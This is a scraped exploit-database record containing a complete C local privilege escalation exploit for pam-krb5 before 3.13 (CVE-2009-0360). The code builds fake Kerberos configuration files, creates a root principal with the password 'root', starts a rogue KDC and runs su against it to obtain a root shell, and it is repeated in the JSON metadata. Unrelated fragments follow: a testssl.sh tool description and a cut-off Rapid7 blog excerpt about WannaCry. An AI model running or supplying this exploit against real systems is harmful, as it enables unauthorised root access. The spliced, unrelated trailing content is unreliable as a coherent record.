pam-krb5 < 3.13 Local Privilege Escalation Exploit
2009-03-29T00:00:00
ID 1337DAY-ID-7919 Type zdt Reporter Jon Oberheide Modified 2009-03-29T00:00:00
Description
Exploit for linux platform in category local exploits
==================================================
pam-krb5 < 3.13 Local Privilege Escalation Exploit
==================================================
/*
* cve-2009-0360.c
*
* pam-krb5 < 3.13 local privilege escalation
*
* Information:
*
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0360
*
* pam-krb5 before 3.13, when linked against MIT Kerberos, does not properly
* initialize the Kerberos libraries for setuid use, which allows local
* users to gain privileges by pointing an environment variable to a
* modified Kerberos configuration file, and then launching a PAM-based
* setuid application.
*
* Usage:
*
* $ gcc cve-2009-0360.c -o cve-2009-0360
* $ ./cve-2009-0360
* [+] creating krb5.conf
* [+] creating kdc.conf
* [+] creating kerberos database
* Loading random data
* Initializing database '/tmp/cve-2009-0360/principal' for realm 'TEST.COM',
* master key name 'K/[email protected]'
* [+] adding principal [email protected]
* Authenticating as principal [email protected] with password.
* Enter KDC database master key:
* WARNING: no policy specified for [email protected]; defaulting to no policy
* Principal "[email protected]" created.
* [+] launching krb5kdc on 141.212.110.163:6666
* [+] launching su with fake KDC configuration
* [+] enter "root" at the password prompt
* Password:
* # id
* uid=0(root) gid=0(root) ...
*
* Notes:
*
* This exploit will result in local privilege escalation on hosts that use
* the pam-krb5 module for su authentication. Check the su and system-auth
* PAM configuration files in /etc/pam.d to determine if pam-krb5 is in use.
* Some customization of the defined constants and paths may be necessary
* for your environment. Be sure to set FAKE_KDC_HOST to the IP address of
* an active non-loopback interface on the target machine.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>
#define REALM "TEST.COM"
#define FAKE_KDC_HOST "141.212.110.163"
#define FAKE_KDC_PORT "6666"
#define PRINCIPAL_NAME "root"
#define PRINCIPAL_PASS "root"
#define TMP_DIR "/tmp/cve-2009-0360"
#define KUTIL_PATH "/usr/sbin/kdb5_util"
#define KADMIN_PATH "/usr/sbin/kadmin.local"
#define KRB5KDC_PATH "/usr/sbin/krb5kdc"
#define KRB5_CONF \
"[libdefaults]\n\tdefault_realm = " REALM "\n\n[realms]\n\t" REALM \
" = {\n\t\tadmin_server = " FAKE_KDC_HOST ":" FAKE_KDC_PORT "\n\t\t" \
"default_domain = " REALM "\n\t\tkdc = " FAKE_KDC_HOST ":" FAKE_KDC_PORT \
"\n\t}\n\n[domain_realm]\n\t." REALM " = " REALM "\n\t" REALM " = " REALM
#define KDC_CONF \
"[kdcdefaults]\n\tkdc_ports = " FAKE_KDC_PORT "\n\n[realms]\n\t" REALM \
" = {\n\t\tdatabase_name = " TMP_DIR "/principal\n\t\tadmin_keytab = " \
"FILE:" TMP_DIR "/kadm5.keytab\n\t\tacl_file = " TMP_DIR "/kadm5.acl" \
"\n\t\tkey_stash_file = " TMP_DIR "/stash\n\t\tkdc_ports = " FAKE_KDC_PORT \
"\n\t\tmax_life = 10h 0m 0s\n\t\tmax_renewable_life = 7d 0h 0m 0s\n\t}"
int
main(void)
{
int ret;
FILE *fp;
char *err;
ret = mkdir(TMP_DIR, 0755);
if (ret == -1 && errno != EEXIST) {
err = "cannot create TMP_DIR";
printf("[-] Error: %s (%s)\n", err, strerror(errno));
return 1;
}
printf("[+] creating krb5.conf\n");
sleep(1);
fp = fopen(TMP_DIR "/krb5.conf", "w");
if (!fp) {
err = "cannot open krb5.conf";
printf("[-] Error: %s (%s)\n", err, strerror(errno));
return 1;
}
fwrite(KRB5_CONF, 1, strlen(KRB5_CONF), fp);
fclose(fp);
printf("[+] creating kdc.conf\n");
sleep(1);
fp = fopen(TMP_DIR "/kdc.conf", "w");
if (!fp) {
err = "cannot open kdc.conf";
printf("[-] Error: %s (%s)\n", err, strerror(errno));
return 1;
}
fwrite(KDC_CONF, 1, strlen(KDC_CONF), fp);
fclose(fp);
chdir(TMP_DIR);
printf("[+] creating kerberos database\n");
sleep(1);
ret = system(KUTIL_PATH " create -d " TMP_DIR "/principal -sf " TMP_DIR \
"/stash -r " REALM " -s -P \"\"");
if (WEXITSTATUS(ret) != 0) {
err = "kdb5_util command returned non-zero";
printf("[-] Error: %s, continuing exploit anyway\n", err);
}
printf("[+] adding principal " PRINCIPAL_NAME "@" REALM "\n");
sleep(1);
ret = system("echo \"\" | " KADMIN_PATH " -m -p " PRINCIPAL_NAME "@" REALM \
" -d " TMP_DIR "/principal -r " REALM " -q \"add_principal " \
"-pw " PRINCIPAL_PASS " " PRINCIPAL_NAME "@" REALM "\"");
if (WEXITSTATUS(ret) != 0) {
err = "kadmin.local command returned non-zero";
printf("[-] Error: %s, continuing exploit anyway\n", err);
}
printf("[+] launching krb5kdc on " FAKE_KDC_HOST ":" FAKE_KDC_PORT "\n");
sleep(1);
ret = system("KRB5_KDC_PROFILE=\"" TMP_DIR "/kdc.conf\" " KRB5KDC_PATH \
" -d " TMP_DIR "/principal -r " REALM);
if (WEXITSTATUS(ret) != 0) {
err = "krb5kdc command returned non-zero";
printf("[-] Error: %s, continuing exploit anyway\n", err);
}
printf("[+] launching su with fake KDC configuration\n");
sleep(1);
printf("[+] enter \"" PRINCIPAL_PASS "\" at the password prompt\n");
sleep(1);
system("KRB5_CONFIG=\"" TMP_DIR "/krb5.conf\" su");
return 0;
}
# 0day.today [2018-04-10] #
{"hash": "0dd6b4b0675de7a8f74fbbadd5503e55028dccaa92a1e13eb9398bb84a1d4e7e", "id": "1337DAY-ID-7919", "lastseen": "2018-04-10T04:21:13", "viewCount": 1, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8be7a8b03e0d0b6e92b55fa1f40b9528", "key": "description"}, {"hash": "099ca755b8ab6cf6a0c4e75e8826fc04", "key": "href"}, {"hash": "4390347e176ff2a1b7f19cc23c4a9180", "key": "modified"}, {"hash": "4390347e176ff2a1b7f19cc23c4a9180", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "8ebcd5c1bbda80c80d5c98bac81c73ce", "key": "reporter"}, {"hash": "f2c4c1e19174231e2aa237e48925be06", "key": "sourceData"}, {"hash": "30eb236def769c326b93fe760265201a", "key": "sourceHref"}, {"hash": "0d6bf551d9e5915315f9f0cdd6141c3e", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 7.2, "vector": "NONE"}, "dependencies": {"references": [], "modified": "2018-04-10T04:21:13"}, "vulnersScore": 7.2}, "type": "zdt", "sourceHref": "https://0day.today/exploit/7919", "description": "Exploit for linux platform in category local exploits", "title": "pam-krb5 < 3.13 Local Privilege Escalation Exploit", "history": [{"bulletin": {"hash": "b0e1c4707c93124c7b0478ba7c711885a730fbf860d2794aad74bf16ebc63d72", "id": "1337DAY-ID-7919", "lastseen": "2016-04-20T01:11:32", "enchantments": {"score": {"value": 1.3, "vector": "AV:L/AC:M/Au:M/C:N/I:P/A:N/", "modified": "2016-04-20T01:11:32"}}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "8ebcd5c1bbda80c80d5c98bac81c73ce", "key": "reporter"}, {"hash": "b2f2be0cfe67d31002bc18594e1e3294", "key": "href"}, {"hash": "0d6bf551d9e5915315f9f0cdd6141c3e", "key": "title"}, {"hash": "8be7a8b03e0d0b6e92b55fa1f40b9528", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "21f3e22aeb018d74a764d53bec87e567", "key": "sourceData"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "4390347e176ff2a1b7f19cc23c4a9180", "key": "modified"}, {"hash": "bf6641a2f2795b56834efb7048c91788", "key": "sourceHref"}, {"hash": "4390347e176ff2a1b7f19cc23c4a9180", "key": "published"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/7919", "description": "Exploit for linux platform in category local exploits", "viewCount": 0, "title": "pam-krb5 < 3.13 Local Privilege Escalation Exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "==================================================\r\npam-krb5 < 3.13 Local Privilege Escalation Exploit\r\n==================================================\r\n\r\n\r\n/*\r\n * cve-2009-0360.c\r\n *\r\n * pam-krb5 < 3.13 local privilege escalation\r\n *\r\n * Information:\r\n *\r\n * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0360\r\n *\r\n * pam-krb5 before 3.13, when linked against MIT Kerberos, does not properly \r\n * initialize the Kerberos libraries for setuid use, which allows local \r\n * users to gain privileges by pointing an environment variable to a \r\n * modified Kerberos configuration file, and then launching a PAM-based \r\n * setuid application. \r\n * \r\n * Usage:\r\n *\r\n * $ gcc cve-2009-0360.c -o cve-2009-0360\r\n * $ ./cve-2009-0360\r\n * [+] creating krb5.conf\r\n * [+] creating kdc.conf\r\n * [+] creating kerberos database\r\n * Loading random data\r\n * Initializing database '/tmp/cve-2009-0360/principal' for realm 'TEST.COM',\r\n * master key name 'K/M@TEST.COM'\r\n * [+] adding principal root@TEST.COM\r\n * Authenticating as principal root@TEST.COM with password.\r\n * Enter KDC database master key: \r\n * WARNING: no policy specified for root@TEST.COM; defaulting to no policy\r\n * Principal \"root@TEST.COM\" created.\r\n * [+] launching krb5kdc on 141.212.110.163:6666\r\n * [+] launching su with fake KDC configuration\r\n * [+] enter \"root\" at the password prompt\r\n * Password: \r\n * # id\r\n * uid=0(root) gid=0(root) ...\r\n *\r\n * Notes:\r\n *\r\n * This exploit will result in local privilege escalation on hosts that use \r\n * the pam-krb5 module for su authentication. Check the su and system-auth\r\n * PAM configuration files in /etc/pam.d to determine if pam-krb5 is in use.\r\n * Some customization of the defined constants and paths may be necessary \r\n * for your environment. Be sure to set FAKE_KDC_HOST to the IP address of\r\n * an active non-loopback interface on the target machine.\r\n */\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <errno.h>\r\n#include <unistd.h>\r\n#include <sys/stat.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h>\r\n\r\n#define REALM \"TEST.COM\"\r\n#define FAKE_KDC_HOST \"141.212.110.163\"\r\n#define FAKE_KDC_PORT \"6666\"\r\n#define PRINCIPAL_NAME \"root\"\r\n#define PRINCIPAL_PASS \"root\"\r\n#define TMP_DIR \"/tmp/cve-2009-0360\"\r\n#define KUTIL_PATH \"/usr/sbin/kdb5_util\"\r\n#define KADMIN_PATH \"/usr/sbin/kadmin.local\"\r\n#define KRB5KDC_PATH \"/usr/sbin/krb5kdc\"\r\n\r\n#define KRB5_CONF \\\r\n \"[libdefaults]\\n\\tdefault_realm = \" REALM \"\\n\\n[realms]\\n\\t\" REALM \\\r\n \" = {\\n\\t\\tadmin_server = \" FAKE_KDC_HOST \":\" FAKE_KDC_PORT \"\\n\\t\\t\" \\\r\n \"default_domain = \" REALM \"\\n\\t\\tkdc = \" FAKE_KDC_HOST \":\" FAKE_KDC_PORT \\\r\n \"\\n\\t}\\n\\n[domain_realm]\\n\\t.\" REALM \" = \" REALM \"\\n\\t\" REALM \" = \" REALM\r\n\r\n#define KDC_CONF \\\r\n \"[kdcdefaults]\\n\\tkdc_ports = \" FAKE_KDC_PORT \"\\n\\n[realms]\\n\\t\" REALM \\\r\n \" = {\\n\\t\\tdatabase_name = \" TMP_DIR \"/principal\\n\\t\\tadmin_keytab = \" \\\r\n \"FILE:\" TMP_DIR \"/kadm5.keytab\\n\\t\\tacl_file = \" TMP_DIR \"/kadm5.acl\" \\\r\n \"\\n\\t\\tkey_stash_file = \" TMP_DIR \"/stash\\n\\t\\tkdc_ports = \" FAKE_KDC_PORT \\\r\n \"\\n\\t\\tmax_life = 10h 0m 0s\\n\\t\\tmax_renewable_life = 7d 0h 0m 0s\\n\\t}\"\r\n\r\nint\r\nmain(void)\r\n{\r\n int ret;\r\n FILE *fp;\r\n char *err;\r\n\r\n ret = mkdir(TMP_DIR, 0755);\r\n if (ret == -1 && errno != EEXIST) {\r\n err = \"cannot create TMP_DIR\";\r\n printf(\"[-] Error: %s (%s)\\n\", err, strerror(errno));\r\n return 1;\r\n }\r\n\r\n printf(\"[+] creating krb5.conf\\n\");\r\n sleep(1);\r\n\r\n fp = fopen(TMP_DIR \"/krb5.conf\", \"w\");\r\n if (!fp) {\r\n err = \"cannot open krb5.conf\";\r\n printf(\"[-] Error: %s (%s)\\n\", err, strerror(errno));\r\n return 1;\r\n }\r\n fwrite(KRB5_CONF, 1, strlen(KRB5_CONF), fp);\r\n fclose(fp);\r\n\r\n printf(\"[+] creating kdc.conf\\n\");\r\n sleep(1);\r\n\r\n fp = fopen(TMP_DIR \"/kdc.conf\", \"w\");\r\n if (!fp) {\r\n err = \"cannot open kdc.conf\";\r\n printf(\"[-] Error: %s (%s)\\n\", err, strerror(errno));\r\n return 1;\r\n }\r\n fwrite(KDC_CONF, 1, strlen(KDC_CONF), fp);\r\n fclose(fp);\r\n\r\n chdir(TMP_DIR);\r\n\r\n printf(\"[+] creating kerberos database\\n\");\r\n sleep(1);\r\n\r\n ret = system(KUTIL_PATH \" create -d \" TMP_DIR \"/principal -sf \" TMP_DIR \\\r\n \"/stash -r \" REALM \" -s -P \\\"\\\"\");\r\n if (WEXITSTATUS(ret) != 0) {\r\n err = \"kdb5_util command returned non-zero\";\r\n printf(\"[-] Error: %s, continuing exploit anyway\\n\", err);\r\n }\r\n\r\n printf(\"[+] adding principal \" PRINCIPAL_NAME \"@\" REALM \"\\n\");\r\n sleep(1);\r\n\r\n ret = system(\"echo \\\"\\\" | \" KADMIN_PATH \" -m -p \" PRINCIPAL_NAME \"@\" REALM \\\r\n \" -d \" TMP_DIR \"/principal -r \" REALM \" -q \\\"add_principal \" \\\r\n \"-pw \" PRINCIPAL_PASS \" \" PRINCIPAL_NAME \"@\" REALM \"\\\"\");\r\n if (WEXITSTATUS(ret) != 0) {\r\n err = \"kadmin.local command returned non-zero\";\r\n printf(\"[-] Error: %s, continuing exploit anyway\\n\", err);\r\n }\r\n\r\n printf(\"[+] launching krb5kdc on \" FAKE_KDC_HOST \":\" FAKE_KDC_PORT \"\\n\");\r\n sleep(1);\r\n\r\n ret = system(\"KRB5_KDC_PROFILE=\\\"\" TMP_DIR \"/kdc.conf\\\" \" KRB5KDC_PATH \\\r\n \" -d \" TMP_DIR \"/principal -r \" REALM);\r\n if (WEXITSTATUS(ret) != 0) {\r\n err = \"krb5kdc command returned non-zero\";\r\n printf(\"[-] Error: %s, continuing exploit anyway\\n\", err);\r\n }\r\n\r\n printf(\"[+] launching su with fake KDC configuration\\n\");\r\n sleep(1);\r\n printf(\"[+] enter \\\"\" PRINCIPAL_PASS \"\\\" at the password prompt\\n\");\r\n sleep(1);\r\n\r\n system(\"KRB5_CONFIG=\\\"\" TMP_DIR \"/krb5.conf\\\" su\");\r\n\r\n return 0;\r\n}\r\n\r\n\r \n\n# 0day.today [2016-04-20] #", "published": "2009-03-29T00:00:00", "references": [], "reporter": "Jon Oberheide", "modified": "2009-03-29T00:00:00", "href": "http://0day.today/exploit/description/7919"}, "lastseen": "2016-04-20T01:11:32", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "==================================================\r\npam-krb5 < 3.13 Local Privilege Escalation Exploit\r\n==================================================\r\n\r\n\r\n/*\r\n * cve-2009-0360.c\r\n *\r\n * pam-krb5 < 3.13 local privilege escalation\r\n *\r\n * Information:\r\n *\r\n * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0360\r\n *\r\n * pam-krb5 before 3.13, when linked against MIT Kerberos, does not properly \r\n * initialize the Kerberos libraries for setuid use, which allows local \r\n * users to gain privileges by pointing an environment variable to a \r\n * modified Kerberos configuration file, and then launching a PAM-based \r\n * setuid application. \r\n * \r\n * Usage:\r\n *\r\n * $ gcc cve-2009-0360.c -o cve-2009-0360\r\n * $ ./cve-2009-0360\r\n * [+] creating krb5.conf\r\n * [+] creating kdc.conf\r\n * [+] creating kerberos database\r\n * Loading random data\r\n * Initializing database '/tmp/cve-2009-0360/principal' for realm 'TEST.COM',\r\n * master key name 'K/[email\u00a0protected]'\r\n * [+] adding principal [email\u00a0protected]\r\n * Authenticating as principal [email\u00a0protected] with password.\r\n * Enter KDC database master key: \r\n * WARNING: no policy specified for [email\u00a0protected]; defaulting to no policy\r\n * Principal \"[email\u00a0protected]\" created.\r\n * [+] launching krb5kdc on 141.212.110.163:6666\r\n * [+] launching su with fake KDC configuration\r\n * [+] enter \"root\" at the password prompt\r\n * Password: \r\n * # id\r\n * uid=0(root) gid=0(root) ...\r\n *\r\n * Notes:\r\n *\r\n * This exploit will result in local privilege escalation on hosts that use \r\n * the pam-krb5 module for su authentication. Check the su and system-auth\r\n * PAM configuration files in /etc/pam.d to determine if pam-krb5 is in use.\r\n * Some customization of the defined constants and paths may be necessary \r\n * for your environment. Be sure to set FAKE_KDC_HOST to the IP address of\r\n * an active non-loopback interface on the target machine.\r\n */\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <errno.h>\r\n#include <unistd.h>\r\n#include <sys/stat.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h>\r\n\r\n#define REALM \"TEST.COM\"\r\n#define FAKE_KDC_HOST \"141.212.110.163\"\r\n#define FAKE_KDC_PORT \"6666\"\r\n#define PRINCIPAL_NAME \"root\"\r\n#define PRINCIPAL_PASS \"root\"\r\n#define TMP_DIR \"/tmp/cve-2009-0360\"\r\n#define KUTIL_PATH \"/usr/sbin/kdb5_util\"\r\n#define KADMIN_PATH \"/usr/sbin/kadmin.local\"\r\n#define KRB5KDC_PATH \"/usr/sbin/krb5kdc\"\r\n\r\n#define KRB5_CONF \\\r\n \"[libdefaults]\\n\\tdefault_realm = \" REALM \"\\n\\n[realms]\\n\\t\" REALM \\\r\n \" = {\\n\\t\\tadmin_server = \" FAKE_KDC_HOST \":\" FAKE_KDC_PORT \"\\n\\t\\t\" \\\r\n \"default_domain = \" REALM \"\\n\\t\\tkdc = \" FAKE_KDC_HOST \":\" FAKE_KDC_PORT \\\r\n \"\\n\\t}\\n\\n[domain_realm]\\n\\t.\" REALM \" = \" REALM \"\\n\\t\" REALM \" = \" REALM\r\n\r\n#define KDC_CONF \\\r\n \"[kdcdefaults]\\n\\tkdc_ports = \" FAKE_KDC_PORT \"\\n\\n[realms]\\n\\t\" REALM \\\r\n \" = {\\n\\t\\tdatabase_name = \" TMP_DIR \"/principal\\n\\t\\tadmin_keytab = \" \\\r\n \"FILE:\" TMP_DIR \"/kadm5.keytab\\n\\t\\tacl_file = \" TMP_DIR \"/kadm5.acl\" \\\r\n \"\\n\\t\\tkey_stash_file = \" TMP_DIR \"/stash\\n\\t\\tkdc_ports = \" FAKE_KDC_PORT \\\r\n \"\\n\\t\\tmax_life = 10h 0m 0s\\n\\t\\tmax_renewable_life = 7d 0h 0m 0s\\n\\t}\"\r\n\r\nint\r\nmain(void)\r\n{\r\n int ret;\r\n FILE *fp;\r\n char *err;\r\n\r\n ret = mkdir(TMP_DIR, 0755);\r\n if (ret == -1 && errno != EEXIST) {\r\n err = \"cannot create TMP_DIR\";\r\n printf(\"[-] Error: %s (%s)\\n\", err, strerror(errno));\r\n return 1;\r\n }\r\n\r\n printf(\"[+] creating krb5.conf\\n\");\r\n sleep(1);\r\n\r\n fp = fopen(TMP_DIR \"/krb5.conf\", \"w\");\r\n if (!fp) {\r\n err = \"cannot open krb5.conf\";\r\n printf(\"[-] Error: %s (%s)\\n\", err, strerror(errno));\r\n return 1;\r\n }\r\n fwrite(KRB5_CONF, 1, strlen(KRB5_CONF), fp);\r\n fclose(fp);\r\n\r\n printf(\"[+] creating kdc.conf\\n\");\r\n sleep(1);\r\n\r\n fp = fopen(TMP_DIR \"/kdc.conf\", \"w\");\r\n if (!fp) {\r\n err = \"cannot open kdc.conf\";\r\n printf(\"[-] Error: %s (%s)\\n\", err, strerror(errno));\r\n return 1;\r\n }\r\n fwrite(KDC_CONF, 1, strlen(KDC_CONF), fp);\r\n fclose(fp);\r\n\r\n chdir(TMP_DIR);\r\n\r\n printf(\"[+] creating kerberos database\\n\");\r\n sleep(1);\r\n\r\n ret = system(KUTIL_PATH \" create -d \" TMP_DIR \"/principal -sf \" TMP_DIR \\\r\n \"/stash -r \" REALM \" -s -P \\\"\\\"\");\r\n if (WEXITSTATUS(ret) != 0) {\r\n err = \"kdb5_util command returned non-zero\";\r\n printf(\"[-] Error: %s, continuing exploit anyway\\n\", err);\r\n }\r\n\r\n printf(\"[+] adding principal \" PRINCIPAL_NAME \"@\" REALM \"\\n\");\r\n sleep(1);\r\n\r\n ret = system(\"echo \\\"\\\" | \" KADMIN_PATH \" -m -p \" PRINCIPAL_NAME \"@\" REALM \\\r\n \" -d \" TMP_DIR \"/principal -r \" REALM \" -q \\\"add_principal \" \\\r\n \"-pw \" PRINCIPAL_PASS \" \" PRINCIPAL_NAME \"@\" REALM \"\\\"\");\r\n if (WEXITSTATUS(ret) != 0) {\r\n err = \"kadmin.local command returned non-zero\";\r\n printf(\"[-] Error: %s, continuing exploit anyway\\n\", err);\r\n }\r\n\r\n printf(\"[+] launching krb5kdc on \" FAKE_KDC_HOST \":\" FAKE_KDC_PORT \"\\n\");\r\n sleep(1);\r\n\r\n ret = system(\"KRB5_KDC_PROFILE=\\\"\" TMP_DIR \"/kdc.conf\\\" \" KRB5KDC_PATH \\\r\n \" -d \" TMP_DIR \"/principal -r \" REALM);\r\n if (WEXITSTATUS(ret) != 0) {\r\n err = \"krb5kdc command returned non-zero\";\r\n printf(\"[-] Error: %s, continuing exploit anyway\\n\", err);\r\n }\r\n\r\n printf(\"[+] launching su with fake KDC configuration\\n\");\r\n sleep(1);\r\n printf(\"[+] enter \\\"\" PRINCIPAL_PASS \"\\\" at the password prompt\\n\");\r\n sleep(1);\r\n\r\n system(\"KRB5_CONFIG=\\\"\" TMP_DIR \"/krb5.conf\\\" su\");\r\n\r\n return 0;\r\n}\r\n\r\n\r \n\n# 0day.today [2018-04-10] #", "published": "2009-03-29T00:00:00", "references": [], "reporter": "Jon Oberheide", "modified": "2009-03-29T00:00:00", "href": "https://0day.today/exploit/description/7919"}
{"kitploit": [{"lastseen": "2019-03-08T07:42:40", "bulletinFamily": "tools", "description": "[  ](<https://1.bp.blogspot.com/-XZKxrIB5PiY/W8_nOEv3K3I/AAAAAAAAM_s/Vgfb-QXKdzsLQG0e27Wo5Atl4wmrR6wBACLcBGAs/s1600/testssl-standard.jpg>)\n\n \n` testssl.sh ` is a free [ command line ](<https://www.kitploit.com/search/label/Command%20Line>) tool which checks a server's service on any port for the support of TLS/SSL ciphers, [ protocols ](<https://www.kitploit.com/search/label/Protocols>) as well as some cryptographic flaws. \n \n** Key features ** \n\n\n * Clear output: you can tell easily whether anything is good or bad \n * Ease of installation: It works for Linux, OSX/Darwin, FreeBSD, NetBSD, OpenBSD (needs bash) and MSYS2/Cygwin out of the box: no need to install or to configure something. No gems, CPAN, pip or the like/ \n * Flexibility: You can test any SSL/TLS enabled and [ STARTTLS ](<https://www.kitploit.com/search/label/STARTTLS>) service, not only webservers at port 443 \n * Toolbox: Several command line options help you to run YOUR test and configure YOUR output \n * Reliability: features are tested thoroughly \n * Verbosity: If a particular check cannot be performed because of a missing capability on your client side, you'll get a warning \n * Privacy: It's only you who sees the result, not a third party \n * Freedom: It's 100% open source. You can look at the code, see what's going on and you can change it. \n * Heck, even the development is open (github) \n \n** Installation ** \nYou can download testssl.sh by cloning this git repository: \n\n \n \n git clone --depth 1 https://github.com/drwetter/testssl.sh.git\n\nOr help yourself downloading the ZIP archive [ https://github.com/drwetter/testssl.sh/archive/2.9dev.zip ](<https://github.com/drwetter/testssl.sh/archive/2.9dev.zip>) . ` testssl.sh --help ` will give you some help upfront. More help: see doc directory with man pages. Older sample runs are at [ https://testssl.sh/ ](<https://testssl.sh/>) . \n \n** Status ** \nHere in the _ 2.9dev branch you find the development version _ of the software -- with new features and maybe some bugs -- albeit we try our best before committing to test changes. Be aware that we also change the output or command line. \nFor the previous stable version please see [ testssl.sh ](<https://testssl.sh/> \"Go to the site with the stable version\" ) or download the interim release 2.9.5 from here [ 2.9.5 ](<https://github.com/drwetter/testssl.sh/tree/2.9.5>) which is is the successor of 2.8 and stable for day-to-day work. \n \n** Compatibility ** \ntestssl.sh is working on every Linux/BSD distribution out of the box. Since 2.9dev most of the limitations of disabled features from the openssl client are gone due to bash-socket-based checks. As a result you can also use e.g. LibreSSL. testssl.sh also works on other unixoid system out of the box, supposed they have ` /bin/bash ` >= version 3.2 and standard tools like sed and awk installed. System V needs to have GNU grep installed. MacOS X and Windows (using MSYS2 or cygwin) work too. OpenSSL version version >= 1.0.2 is recommended for better LOGJAM checks and to display bit strengths for key exchanges. \n \nUpdate notification here or @ [ twitter ](<https://twitter.com/drwetter>) . \n \n** Features implemented in [ 2.9dev ](<https://github.com/drwetter/testssl.sh/blob/2.9dev/Readme.md#devel>) ** \n\n\n * Using bash sockets where ever possible --> better detection of ciphers, independent on the openssl version used. \n * Testing 364 default ciphers ( ` testssl.sh -e/-E ` ) with a mixture of sockets and openssl. Same speed as with openssl only but additional ciphers such as post-quantum ciphers, new CHAHA20/POLY1305, CamelliaGCM etc. \n * Further tests via TLS sockets and improvements (handshake parsing, completeness, robustness), \n * TLS 1.2 protocol check via socket in production \n * Finding more TLS extensions via sockets \n * TLS Supported Groups [ Registry ](<https://www.kitploit.com/search/label/Registry>) (RFC 7919), key shares extension \n * Non-flat JSON support \n * File output (CSV, JSON flat, JSON non-flat) supports a minimum severity level (only above supplied level there will be output) \n * Support of supplying timeout value for ` openssl connect ` \\-- useful for batch/mass scanning \n * Parallel mass testing (!) \n * File input for serial or parallel mass testing can be also in nmap grep(p)able (-oG) format \n * Native HTML support instead going through 'aha' \n * Better formatting of output (indentation) \n * Choice showing the RFC naming scheme only \n * LUCKY13 and SWEET32 checks \n * Check for [ vulnerability ](<https://www.kitploit.com/search/label/Vulnerability>) to Bleichenbacher attacks \n * Ticketbleed check \n * Decoding of unencrypted BIG IP cookies \n * LOGJAM: now checking also for known DH parameters \n * Check for CAA RR \n * Check for OCSP must staple \n * Check for Certificate Transparency \n * Expect-CT Header Detection \n * Check for session resumption (Ticket, ID) \n * TLS Robustness check (GREASE) \n * Postgres und MySQL STARTTLS support, MongoDB support \n * Decodes BIG IP F5 Cookie \n * Fully OpenBSD and LibreSSL support \n * Missing SAN warning \n * Man page \n * Better error msg suppression (not fully installed OpenSSL) \n * DNS over Proxy and other proxy improvements \n * Better JSON output: renamed IDs and findings shorter/better parsable \n * JSON output now valid also for non-responsing servers \n * Added support for private CAs \n * Exit code now 0 for running without error \n * ROBOT check \n * Better extension support \n * Better OpenSSL 1.1.1 support \n * Supports latest and greatest version of TLS 1.3, shows drafts supported \n \nPlease file bug reports @ [ https://github.com/drwetter/testssl.sh/issues ](<https://github.com/drwetter/testssl.sh/issues>) . \n \n** Documentation ** \nFor a start see the [ wiki ](<https://github.com/drwetter/testssl.sh/wiki/Man-Page>) . Help is needed here. Will Hunt provides a good [ description ](<https://www.4armed.com/blog/doing-your-own-ssl-tls-testing/>) for version 2.8, including useful background info. \n \n \n\n\n** [ Download Testssl.Sh ](<https://github.com/drwetter/testssl.sh/>) **\n", "modified": "2018-10-27T12:28:01", "published": "2018-10-27T12:28:01", "id": "KITPLOIT:7686740988509691507", "href": "http://www.kitploit.com/2018/10/testsslsh-testing-tlsssl-encryption.html", "title": "testssl.sh - Testing TLS/SSL Encryption Anywhere On Any Port", "type": "kitploit", "cvss": {"score": 0.0, "vector": "NONE"}}], "rapid7community": [{"lastseen": "2017-06-24T01:16:32", "bulletinFamily": "blog", "description": "<!-- [DocumentBodyStart:53f4c57c-eea0-4790-a908-f2f47ce880e1] --><div class=\"jive-rendered-content\"><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">After <a class=\"jive-link-blog-small\" data-containerId=\"5165\" data-containerType=\"37\" data-objectId=\"7869\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/infosec/blog/2017/05/12/wanna-decryptor-wncry-ransomware-explained\">WannaCry</a> </span><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">hit systems around the world last month, security experts warned that the underlying vulnerabilities that allowed the ransomworm to spread are still unpatched in many environments, rendering those systems vulnerable to other hacking tools from the same toolset. Rapid7’s Project Heisenberg continues to see a high volume of scans and exploit attempts targeting SMB vulnerabilities:</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7919-67213/Heisenberg-smb-3.png\"><img alt=\"Heisenberg-smb-3.png\" class=\"image-1 jive-image\" height=\"351\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7919-67213/1600-351/Heisenberg-smb-3.png\" style=\"width: 620px; height: 136px;\" width=\"1600\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: 